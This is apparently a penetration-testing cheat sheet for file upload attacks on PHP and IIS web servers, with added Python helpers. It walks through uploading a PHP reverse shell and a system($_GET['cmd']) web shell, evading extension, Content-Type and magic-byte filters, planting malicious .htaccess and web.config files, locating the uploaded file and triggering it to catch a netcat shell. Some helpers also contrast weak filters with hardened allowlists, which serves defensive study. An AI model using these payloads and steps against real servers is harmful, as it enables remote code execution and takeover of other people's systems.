FILE UPLOAD ATTACKS

Upload PHP reverse shell

Basic upload attempt — Check if .php is allowed

Upload pentestmonkey php-reverse-shell.php
Example Output
Upload pentestmonkey shell as shell.php
Response: 'File uploaded successfully'
Browse to: http://10.10.10.5/uploads/shell.php

nc -nlvp 443:
connect to [ATTACKER] from [10.10.10.5]
$ whoami
www-data

Bypass extension filter

Try alternative extensions — Different PHP handlers

shell.php5       (legacy AddHandler configs map .php3/.php4/.php5/.php7 as well)
shell.phtml      (still mapped to PHP by the Debian/Ubuntu php module conf)
shell.phar       (same conf maps .phar)
shell.phps       (PHP source handler: highlighted source or 403, not execution; check the response)
shell.php.jpg    (only executes where a middle .php still counts, see Double extension)
shell.PHP        (case-insensitive mod_mime or Windows; the Debian FilesMatch is case-sensitive)
shell.php%00.jpg (NUL byte truncation, PHP < 5.3.4 only)
Example Output
shell.php    -> 'File type not allowed'
shell.php5   -> 'File type not allowed'
shell.phtml  -> 'File uploaded successfully!'
(phtml bypassed the filter)

Bypass content-type check

Intercept and modify — Server trusts the Content-Type of the multipart part

Change the Content-Type header of the file part to image/jpeg in Burp
(the client sets this value, so it proves nothing about the bytes)
Example Output
In Burp, change:
Content-Type: application/x-php
To:
Content-Type: image/jpeg

Server response: 'File uploaded successfully'
(Server only checked the client-supplied Content-Type, never the file
bytes; a magic-byte or image-parse check is not fooled by this alone)
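What the Burp edit above changes, and why a check that trusts the part's Content-Type falls for it while a magic-byte check does not, in an added Python example that is not from the original page. The boundary string and the shell body are constructed values; the multipart builder mirrors what a browser sends for a single file input.

```python
import re

# Constructed sample values: a boundary as a browser/Burp would show it, and a minimal PHP web shell
BOUNDARY = b"----WebKitFormBoundary7MA4YWxkTrZu0gW"
PHP_SHELL = b"<?php system($_GET['cmd']); ?>\n"


def multipart_body(filename: str, content_type: str, data: bytes, boundary: bytes = BOUNDARY) -> bytes:
    """Build the raw multipart/form-data body for <input type="file" name="file">.

    This is the text seen in Burp Repeater; the part's Content-Type line is chosen by the
    client, so rewriting it to image/jpeg costs nothing. The outer request header is
    Content-Type: multipart/form-data; boundary=<boundary>.
    """
    return (
        b"--" + boundary + b"\r\n"
        + b'Content-Disposition: form-data; name="file"; filename="' + filename.encode() + b'"\r\n'
        + b"Content-Type: " + content_type.encode() + b"\r\n"
        + b"\r\n"
        + data + b"\r\n"
        + b"--" + boundary + b"--\r\n"
    )


def parse_file_part(body: bytes, boundary: bytes = BOUNDARY) -> dict:
    """Minimal server-side parse of the first file part: filename, declared type, raw bytes."""
    for part in body.split(b"--" + boundary):
        if b"\r\n\r\n" not in part or b"filename=" not in part:
            continue
        headers, data = part.split(b"\r\n\r\n", 1)
        if data.endswith(b"\r\n"):          # the CRLF before the next delimiter is not file data
            data = data[:-2]
        hdr = headers.decode("latin-1")
        filename = re.search(r'filename="([^"]*)"', hdr).group(1)
        ctype = re.search(r"(?im)^Content-Type:\s*([^\s;]+)", hdr)
        return {"filename": filename,
                "content_type": ctype.group(1).lower() if ctype else "",
                "data": data}
    raise ValueError("no file part in body")


IMAGE_TYPES = {"image/jpeg", "image/png", "image/gif"}


def weak_check(part: dict) -> bool:
    """Vulnerable: trusts the client-supplied Content-Type of the part."""
    return part["content_type"] in IMAGE_TYPES


def magic_check(part: dict) -> bool:
    """Better: look at the bytes that were actually uploaded."""
    d = part["data"]
    return (d.startswith(b"\xff\xd8\xff")              # JPEG
            or d.startswith(b"\x89PNG\r\n\x1a\n")      # PNG
            or d.startswith((b"GIF87a", b"GIF89a")))   # GIF


def simulate(filename: str, content_type: str, data: bytes) -> dict:
    """Round-trip one upload through both checks and report which ones it passes."""
    part = parse_file_part(multipart_body(filename, content_type, data))
    return {"weak": weak_check(part), "magic": magic_check(part)}


if __name__ == "__main__":
    print(multipart_body("shell.php", "image/jpeg", PHP_SHELL).decode())
    for ct, data in [("application/x-php", PHP_SHELL),
                     ("image/jpeg", PHP_SHELL),
                     ("image/jpeg", b"GIF89a;" + PHP_SHELL)]:
        print(f"{ct:20} {data[:8]!r:14} -> {simulate('shell.php', ct, data)}")
```

The third row is the combination that matters in practice: once the server also reads the bytes, the header edit alone stops working and the magic-bytes trick further down is what gets the file through.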

Double extension

Confuse extension parsing — Filter and web server disagree on which extension counts

shell.php.png
shell.jpg.php
Example Output
shell.php.png -> 'Uploaded successfully'
(filter looked at the last extension only)
Apache mod_mime examines every dotted extension, so under a legacy
AddHandler/AddType mapping the .php in the middle still sends the file
to PHP; under the modern <FilesMatch "\.php$"> SetHandler config it is
served as an image and the trick fails
Browse: http://10.10.10.5/uploads/shell.php.png
$ whoami
www-data
shell.jpg.php is the mirror case: it slips past a filter that reads the
first extension, and the server executes it because the real (last)
extension is .php
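To see which of the names above get past which filter, and which of them Apache would actually hand to PHP, here is an added model written for this page (not a tool from the original) of a last-extension denylist, a first-extension denylist, a strict allowlist, and the two common Apache mappings: a legacy AddHandler/AddType line and the Debian/Ubuntu FilesMatch SetHandler block. It covers both the extension-filter list and the double-extension case. The denylist contents, the legacy extension set and the PHP version cut-off for NUL truncation are assumptions, marked in the comments.

```python
import re

# Constructed list of names to try (the page's candidates plus the double-extension ones)
CANDIDATES = ["shell.php", "shell.php5", "shell.phtml", "shell.phar", "shell.phps", "shell.php.jpg",
              "shell.PHP", "shell.php\x00.jpg", "shell.php.png", "shell.jpg.php"]

DENIED = {"php", "php5"}            # assumed contents of a typical hand-written denylist
# Assumed legacy mapping, e.g. AddHandler application/x-httpd-php .php .php3 .php4 .php5 .php7 .phtml .phar
LEGACY_PHP_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}


def blacklist_last_ext(name: str) -> bool:
    """Vulnerable filter: compares only the last extension, case-sensitively, against a denylist."""
    return name.rsplit(".", 1)[-1] not in DENIED


def blacklist_first_ext(name: str) -> bool:
    """Vulnerable filter: checks the first extension (what 'shell.jpg.php' is built for)."""
    return name.split(".")[1] not in DENIED if "." in name else True


def allowlist_strict(name: str) -> bool:
    """Hardened filter: one lowercase extension from an allowlist, no control bytes.
    Pair it with a server-generated filename and a non-executable upload directory."""
    return re.fullmatch(r"[a-z0-9_-]+\.(jpe?g|png|gif)", name) is not None


def stored_name(name: str, php_version=(7, 4)):
    """Name that ends up on disk. PHP < 5.3.4 truncated paths at a NUL byte (the %00 trick);
    current PHP refuses paths containing NUL, so the upload fails (None)."""
    if "\x00" not in name:
        return name
    return name.split("\x00", 1)[0] if php_version < (5, 3, 4) else None


def apache_addhandler_executes(name) -> bool:
    """AddHandler/AddType mapping: mod_mime examines every dotted extension in the name,
    case-insensitively, so shell.php.png and shell.PHP are both handed to PHP."""
    if name is None:
        return False
    return any(ext in LEGACY_PHP_EXTS for ext in name.lower().split(".")[1:])


def apache_filesmatch_executes(name) -> bool:
    """Debian/Ubuntu php module conf: <FilesMatch ".+\\.ph(ar|p|tml)$"> SetHandler ...
    Only the final extension counts and the match is case-sensitive."""
    if name is None:
        return False
    return re.search(r".+\.ph(ar|p|tml)$", name) is not None


def evaluate(name: str, php_version=(7, 4)) -> dict:
    """Which filters the submitted name passes and which server mappings would execute it."""
    on_disk = stored_name(name, php_version)
    return {
        "passes_blacklist_last": blacklist_last_ext(name),
        "passes_blacklist_first": blacklist_first_ext(name),
        "passes_allowlist": allowlist_strict(name),
        "runs_addhandler": apache_addhandler_executes(on_disk),
        "runs_filesmatch": apache_filesmatch_executes(on_disk),
    }


if __name__ == "__main__":
    for n in CANDIDATES:
        r = evaluate(n)
        print(f"{n!r:22}", " ".join(f"{k}={'Y' if v else 'n'}" for k, v in r.items()))
```

The rows worth reading are shell.phtml (passes the denylist and executes under both mappings), shell.php.png and shell.PHP (execute only under the legacy mapping) and shell.phps (passes the filter but executes nowhere); the allowlist rejects every candidate.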

Magic bytes bypass

Bypass magic byte checks — File starts as valid image

Add GIF89a; to the start of the PHP file (getimagesize() and most
magic-number checks only read the header)
Or embed the PHP in the metadata of a real image (EXIF comment, GIF
comment block) so that even a full parse of the image succeeds
Example Output
Add GIF89a; at top of PHP shell:
GIF89a;
<?php system($_GET['cmd']); ?>

Upload as shell.gif.php or shell.php (the name must still map to the
PHP handler; a plain .gif name is served as an image)
Server sees GIF magic bytes, allows upload
(Fails if the server re-encodes the image with GD/ImageMagick, which
drops the payload; a scan for <?php in the bytes also catches it)

Upload .htaccess

Change how server handles files — Make .jpg execute as PHP

Upload .htaccess:
AddType application/x-httpd-php .jpg
Then upload shell.jpg
Example Output
Upload .htaccess containing:
AddType application/x-httpd-php .jpg

Then upload shell.jpg (with PHP code inside)
Browse: http://10.10.10.5/uploads/shell.jpg
$ whoami
www-data
(.jpg now executes as PHP)
(Needs mod_php and AllowOverride FileInfo or All for the upload
directory; if AddType is ignored try AddHandler application/x-httpd-php
.jpg; the upload filter must also accept a dotfile with no extension)

Upload web.config (IIS)

IIS equivalent of .htaccess — ASP.NET (ASPX) execution

Upload web.config that maps *.jpg to the ASP.NET page handler
Example Output
Upload web.config:
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <system.webServer>
    <handlers>
      <add name="aspnet" path="*.jpg" verb="*" type="System.Web.UI.PageHandlerFactory"/>
    </handlers>
  </system.webServer>
</configuration>

Upload shell.jpg containing ASPX code
Browse to execute
(IIS now hands .jpg to the same handler that serves .aspx; needs an
ASP.NET application pool in integrated mode and a handlers section
that is not locked in applicationHost.config)

Find upload location

Where did the file go? — Need path to trigger execution

Check response, view source, or gobuster
Example Output
Response: 'File uploaded to /uploads/shell.php'
OR: View source -> <img src='/uploads/shell.php'>
OR: gobuster dir -u http://10.10.10.5 -w wordlist.txt
  /uploads/ (Status: 301)
(Need the path to trigger your shell)
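An added helper (not part of the original page) for the three cases above: it pulls candidate paths for the uploaded file out of a plain-text, HTML or JSON upload response, falls back to references with the same extension when the server renamed the file, and finally to guesses in common upload directories, which is the list you would otherwise feed to gobuster. The base URL, the directory list and the sample responses are assumptions.

```python
import json
import re
import socket
import urllib.error
import urllib.request
from html.parser import HTMLParser
from urllib.parse import urljoin

# Assumed: the target from the page, and directories to guess when the response gives nothing away
BASE_URL = "http://10.10.10.5/"
COMMON_DIRS = ["uploads", "upload", "files", "images", "img", "media", "static", "tmp"]


class _RefCollector(HTMLParser):
    """Collect src/href/action/data attribute values from an HTML response."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        for key, value in attrs:
            if key in ("src", "href", "action", "data") and value:
                self.refs.append(value)


def _json_strings(obj):
    """Yield every string inside a decoded JSON document."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for v in obj.values():
            yield from _json_strings(v)
    elif isinstance(obj, list):
        for v in obj:
            yield from _json_strings(v)


def find_uploaded_path(body: str, filename: str, base_url: str = BASE_URL) -> list:
    """Candidate URLs for the uploaded file, best first.

    1. any absolute path or URL in the body ending in the exact filename (text, HTML, JSON)
    2. HTML/JSON references with the same extension (server renamed the file)
    3. guesses in common upload directories
    """
    ext = filename.rsplit(".", 1)[-1]
    exact = re.findall(r"(?:https?://[^\s\"'<>]*|/[^\s\"'<>]*)" + re.escape(filename) + r"(?![\w.])", body)
    refs = []
    try:
        refs.extend(_json_strings(json.loads(body)))
    except ValueError:                      # not JSON: treat it as HTML (or plain text with no tags)
        collector = _RefCollector()
        collector.feed(body)
        refs = collector.refs
    exact += [r for r in refs if r.endswith(filename)]
    renamed = [r for r in refs if r.lower().endswith("." + ext.lower()) and r not in exact]
    guesses = [f"/{d}/{filename}" for d in COMMON_DIRS]
    return list(dict.fromkeys(urljoin(base_url, c) for c in exact + renamed + guesses))


def trigger(url: str, timeout: float = 5.0) -> int:
    """GET the uploaded file to run it (start the nc listener first). A reverse shell keeps
    the HTTP response open, so a timeout here is the expected sign of success, not an error."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status
    except (socket.timeout, urllib.error.URLError):
        return 0


if __name__ == "__main__":
    # Constructed sample responses of the three shapes seen in practice
    for sample in ["File uploaded to /uploads/shell.php",
                   "<html><body><img src='/uploads/shell.php'></body></html>",
                   '{"ok": true, "url": "http://10.10.10.5/files/shell.php"}',
                   '<p>Done</p><img src="/media/4f2a9c.php">']:
        print(find_uploaded_path(sample, "shell.php")[:2])
```

Relative references without a leading slash are only picked up from HTML attributes, not from free text; if the response has neither, the guessed list is what you hand to gobuster or curl, and the first URL that returns 200 is the one to trigger.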

Trigger uploaded shell

Execute your uploaded file — Start netcat listener first

curl http://$IP/uploads/shell.php
or browse to it
Example Output
nc -nlvp 443
curl http://10.10.10.5/uploads/shell.php

Listening on 0.0.0.0 443
Connection received from 10.10.10.5
$ whoami
www-data
(Reverse shell caught!)